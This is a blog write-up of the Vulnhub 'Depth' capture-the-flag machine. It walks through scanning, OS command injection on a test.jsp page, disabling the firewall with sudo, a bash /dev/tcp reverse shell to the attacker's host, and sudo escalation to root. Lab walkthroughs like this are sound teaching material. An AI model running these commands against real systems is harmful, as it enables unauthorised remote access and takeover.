evilox.medium.com

Depth Vulnhub Writeup

Vignesh
~3 minutes

Vignesh

Press enter or click to view image in full size

Depth vulhub writeup

Hi guys, Warm welcome to my blog. Today we going to discuss about depth vulnhub machine and is a very easiest machine that is coming up with OS command injection vulnerability on the debugging page and its running on the java server

To escalate the root privilege we want to abuse the sudo binary.

So first fire up your machine in your virtual box

Download the machine: https://www.vulnhub.com/entry/depth-1,213/

As usual we startup with a nmap scan

STEP 1: nmap -sC -sV 192.168.0.12

Press enter or click to view image in full size

Depth vulhub writeup nmap

Further analyzing this nmap result I have found some interesting services and ports which is SSH in 22 and HTTP in 8080 etc.

So let us visit that web page which is http://192.168.0.12:8080

Here I have checked all links but nothing should be interesting.

So further I enumerated using the nikto tool

STEP 2: nikto -h http://192.168.0.12:8080

Press enter or click to view image in full size

Depth vulnub writeup apache

After analyzing this report I have found one interesting file which is test.jsp

So let's check it this http://192.168.0.12:8080/test.jsp

Press enter or click to view image in full size

Further analyzing this web page I found that this page is affected by os command injection vulnerability which we can able to run the system command.

So first I tried

STEP 3: ls -l /tmp

Press enter or click to view image in full size

Now it will list the file from the tmp folder

Get Vignesh’s stories in your inbox

Join Medium for free to get updates from this writer.

So next I tried for home directory

STEP 4: ls -l /home

Press enter or click to view image in full size

Now you get the username of that system which is bill

So next I disabled the firewall of that machine

STEP 5: ssh bill@localhost sudo ufw disable

Press enter or click to view image in full size

Next, we going to write the reverse shell

Before that setup your listener

STEP 6: nc -lvp 4242

Press enter or click to view image in full size

STEP 7: ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.2/4242 0>&1

Press enter or click to view image in full size

Booooooooommmmmmm!!!!!

Now you get the user shell of that machine

To escalate the root privilege we go for sudo binary abuse

STEP 8: sudo -l

Press enter or click to view image in full size

STEP 9: sudo su

Booooooooommmmmmmmmm!!!!

Now you will get the root shell

STEP 10: cd root

STEP 11: cat flag

Press enter or click to view image in full size

I hope you will understand this article if you like this please donate to us

OSCP student: